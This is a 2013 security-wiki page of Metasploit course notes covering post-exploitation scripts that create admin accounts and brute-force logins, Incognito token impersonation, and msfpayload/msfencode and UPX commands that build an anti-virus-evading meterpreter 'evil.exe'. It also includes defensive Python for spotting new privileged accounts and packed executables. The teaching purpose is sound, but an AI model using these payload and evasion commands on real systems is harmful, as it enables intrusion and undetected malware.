Metasploit

From Paul's Security Weekly
Revision as of 23:26, 10 April 2013 by Paul Asadoorian (Talk | contribs)


Introduction

This page is presented without warranty or support. It is meant to provide supplementary materials as a reference for Metasploit and is not part of any official course material. Please direct all comments, questions, and suggestions to psw@pauldotcom.com.

Thank You,

The PaulDotCom Team

SEC553 Materials

The SANS course uses the following software:

  • Firefox - For the browser_autopwn exercise you will need an older version of Firefox. Download Firefox Version 1.0.4 Here. This should also be installed on the Windows VM that you will be exploiting.

Setup Your Environment

Using the "setg" command you can set global datastores (variables). Once you've set up your RHOST, for example, you can issue the "save" command and Metasploit will write your global datastores to a config file in the ".msf" directory in your home directory (".msf3" in the example below). Below is an example:

msf > setg

Global
======

  Name   Value           
  ----   -----           
  RHOST  192.168.169.30  

msf > setg RHOST 192.168.169.40
RHOST => 192.168.169.40
msf > save
Saved configuration to: /Users/paul/.msf3/config
msf > setg

Global
======

  Name   Value           
  ----   -----           
  RHOST  192.168.169.40  

msf >

References & Resources

PaulDotCom Technical Segments On Metasploit and Practical Usages

  • "karmetasploit" technical Segment: PaulDotCom Episode 114 - Probably one of the most powerful features in Metasploit is its integration with Karma, a wireless attack that lets you become the access point for any probe SSID. Scripts allow you to do evil things to the client, such as steal cookies and Windows authentication credentials.

Other Metasploit Related Resources

Icecast Exploit

Icecast exploit.png

Icecast Background Task

Icecast background.png

HTTP Scanner

Http scanner.png

Database: db_nmap

Db nmap.png

Custom Meterpreter Scripts

Go to http://darkoperator.blogspot.com/ and review the available downloads:

  • gettelnet - This script enables the telnet service on the target machine if it is running Windows 2003 or higher. On Windows Vista and Windows 2008, which do not have the service installed by default, the script installs the service and configures it to start automatically. In addition, a username and password can be provided so that a local account with administrative privileges is created and placed in the appropriate groups.
  • remotewinenum - This script runs wmic commands that enumerate different settings on a target computer using the credentials of the process under which meterpreter is running; a username and password can also be provided.
  • Winenum - General Windows enumeration script for gathering all kinds of information from a Windows host, adapting the commands and the information gathered to the version of Windows on which it is run.
  • Netenum - Network enumeration script for performing basic network enumeration of the target environment. It performs ping sweeps, hostname brute force, reverse lookups on ranges and general DNS record enumeration.
  • Winbf - Performs login brute-force attacks against Windows logins using dictionaries, against a single login or a list of usernames. It also enumerates the current Windows account lockout and length policy so the user can better tailor the attack.
  • Getgui - Script for enabling RDP and for creating an account and adding it to the appropriate groups so that Remote Desktop can be used on the target machine.

Now go to this directory "<metasploit dir>/scripts/meterpreter/" and download the scripts:

wget http://metasploit.com/svn/framework3/trunk/scripts/meterpreter/getgui.rb
wget http://metasploit.com/svn/framework3/trunk/scripts/meterpreter/winbf.rb
wget http://metasploit.com/svn/framework3/trunk/scripts/meterpreter/netenum.rb
wget http://metasploit.com/svn/framework3/trunk/scripts/meterpreter/winenum.rb
wget http://metasploit.com/svn/framework3/trunk/scripts/meterpreter/remotewinenum.rb
wget http://metasploit.com/svn/framework3/trunk/scripts/meterpreter/gettelnet.rb
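
From the defender's side, the account handling described for getgui and gettelnet (a new local account placed straight into privileged groups) leaves a recognisable pair of Windows Security events: 4720 (account created) and 4732 (member added to a local group) on Vista/2008 and later. The following is an added example, not part of the original page or of the scripts; the record layout, host names and account names are constructed, and it assumes the log pipeline has already resolved the member SID to an account name.

```python
from datetime import datetime, timedelta

ACCOUNT_CREATED, ADDED_TO_LOCAL_GROUP = 4720, 4732
WATCHED_GROUPS = {"Administrators", "Remote Desktop Users"}

# Constructed sample records, reduced to the fields the correlation needs.
SAMPLE_EVENTS = [
    {"time": "2013-04-10T23:01:12", "id": 4720, "host": "WS01", "account": "support2"},
    {"time": "2013-04-10T23:01:13", "id": 4732, "host": "WS01", "account": "support2",
     "group": "Remote Desktop Users"},
    {"time": "2013-04-10T23:01:13", "id": 4732, "host": "WS01", "account": "support2",
     "group": "Administrators"},
    {"time": "2013-04-10T09:15:00", "id": 4720, "host": "WS02", "account": "jsmith"},
    {"time": "2013-04-11T14:30:00", "id": 4732, "host": "WS02", "account": "jsmith",
     "group": "Administrators"},
    {"time": "2013-04-10T10:00:00", "id": 4732, "host": "WS03", "account": "alice",
     "group": "Backup Operators"},
]

def new_privileged_accounts(events, window=timedelta(minutes=5)):
    """Return {(host, account): [groups]} for accounts that were created and then
    added to a watched group within `window` of their creation."""
    created, hits = {}, {}
    for ev in sorted(events, key=lambda e: e["time"]):  # ISO timestamps sort as text
        when = datetime.fromisoformat(ev["time"])
        key = (ev["host"], ev["account"])
        if ev["id"] == ACCOUNT_CREATED:
            created[key] = when
        elif ev["id"] == ADDED_TO_LOCAL_GROUP and ev["group"] in WATCHED_GROUPS:
            born = created.get(key)
            if born is not None and when - born <= window:
                hits.setdefault(key, set()).add(ev["group"])
    return {key: sorted(groups) for key, groups in hits.items()}

if __name__ == "__main__":
    for (host, account), groups in new_privileged_accounts(SAMPLE_EVENTS).items():
        print(f"{host}: new account {account} added to {', '.join(groups)}")
```

The short window separates scripted creation from ordinary provisioning, where group membership usually follows later; widen it if your own provisioning tools do both steps at once and then allow-list their service account.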

Check out cool posts from "Darkoperator":

http://forum.pauldotcom.com/search.php?search_id=1583029610

Bonus: Find and run the custom script darkoperator wrote for PaulDotCom.

Winenum In Action

Winenum.png

GetGui In Action

Getgui.png

Token Passing With Incognito

I did not have a domain to test with, so this example is pretty silly. However, the bottom line here is that you can jump from a local admin account to a domain admin account in most cases. I think this is a pretty big security hole; Microsoft does not, and dismisses it as "working by design". Below is an example:

Incognito.png


  • Another great tool for this is gsecdump
  • Check out the carnal0wnage blog post for more information. Even more interesting are the comments that link to another resource which *claims* to be able to copy the SAM database without Admin privs. It is somehow able to bypass the file restrictions/permissions by accessing the hard drive directly. We have not tested this.

Using Metasploit To Bypass Anti-Virus

After we gave the above tech segment, some corrections were posted by Mark Baggett:

http://www.indepthdefense.com/2008/12/msfencoding-tips-and-sans-cdi.html

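So we end up with the following commands to create msf payloads that bypass anti-virus software. Note that running the same command twice produces a file with a different MD5 each time, so a hash-based signature for one output will not match the next: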

bash-3.2# ./msfpayload windows/meterpreter/bind_tcp LPORt=4444 R | ./msfencode -t exe -o evil.exe
[*] x86/shikata_ga_nai succeeded, final size 335

bash-3.2# md5 evil.exe
MD5 (evil.exe) = a4c3438633637f37ab10cd16dc9de353
bash-3.2# ./msfpayload windows/meterpreter/bind_tcp LPORt=4444 R | ./msfencode -t exe -o evil.exe
[*] x86/shikata_ga_nai succeeded, final size 335

bash-3.2# md5 evil.exe
MD5 (evil.exe) = 25c08351d3bcdfa08da60509a17ee631

NOTE: Metasploit is not a packer, so it does not have a facility to take a binary payload and "pack" it. We've had great luck using UPX and PEScrambler for this purpose. Unfortunately, the PEScrambler web site has been taken down. I do have a copy, and have been known to share :) For UPX, you can take any Windows binary and do this (using gsecdump.exe as an example):

c:\> upx -2 -o gsecupx.exe gsecdump.exe
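
Because the file hash changes with every build, triage of a suspect binary usually falls back on structure. The following is an added example (not from the original page or from any tool it names) that reads a PE section table and reports the traits a stock UPX run leaves behind: UPX0/UPX1 section names, sections that are both writable and executable, and an executable section with no bytes on disk. The two sample images are constructed, header-only byte strings.

```python
import struct

MEM_EXECUTE, MEM_WRITE = 0x20000000, 0x80000000  # IMAGE_SCN_MEM_* flags

def pe_sections(data):
    """Return [(name, virtual_size, raw_size, characteristics)] for a PE image."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    _, count, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    table = e_lfanew + 24 + opt_size  # signature + COFF header + optional header
    if table + 40 * count > len(data):
        raise ValueError("truncated section table")
    sections = []
    for off in range(table, table + 40 * count, 40):
        name, vsize, _va, raw_size = struct.unpack_from("<8sIII", data, off)
        (flags,) = struct.unpack_from("<I", data, off + 36)
        sections.append((name.rstrip(b"\0").decode("latin-1"), vsize, raw_size, flags))
    return sections

def packer_indicators(data):
    """List human-readable reasons why the image looks packed (empty if none)."""
    findings = []
    for name, vsize, raw_size, flags in pe_sections(data):
        if name.upper().startswith("UPX"):
            findings.append(f"{name}: UPX section name")
        if flags & MEM_WRITE and flags & MEM_EXECUTE:
            findings.append(f"{name}: writable and executable")
        if raw_size == 0 and vsize > 0 and flags & MEM_EXECUTE:
            findings.append(f"{name}: executable but empty on disk")
    return findings

def build_sample(sections):
    """Constructed input: PE headers only, no code or data."""
    dos = b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40)
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 0, 0x102)
    rows = [struct.pack("<8sIIIIIIHHI", n, vs, 0x1000, rs, 0, 0, 0, 0, 0, fl)
            for n, vs, rs, fl in sections]
    return dos + coff + b"".join(rows)

PACKED = build_sample([(b"UPX0", 0x8000, 0, 0xE0000080),
                       (b"UPX1", 0x4000, 0x3E00, 0xE0000040),
                       (b".rsrc", 0x1000, 0x400, 0xC0000040)])
PLAIN = build_sample([(b".text", 0x5000, 0x5000, 0x60000020), (b".data", 0x1000, 0x800, 0xC0000040)])

if __name__ == "__main__":
    print(packer_indicators(PACKED), packer_indicators(PLAIN))
```

Section names are trivially renamed, so the two flag-based checks matter more than the name match; plenty of legitimate software ships UPX-packed, which makes a hit a reason to look closer rather than a verdict.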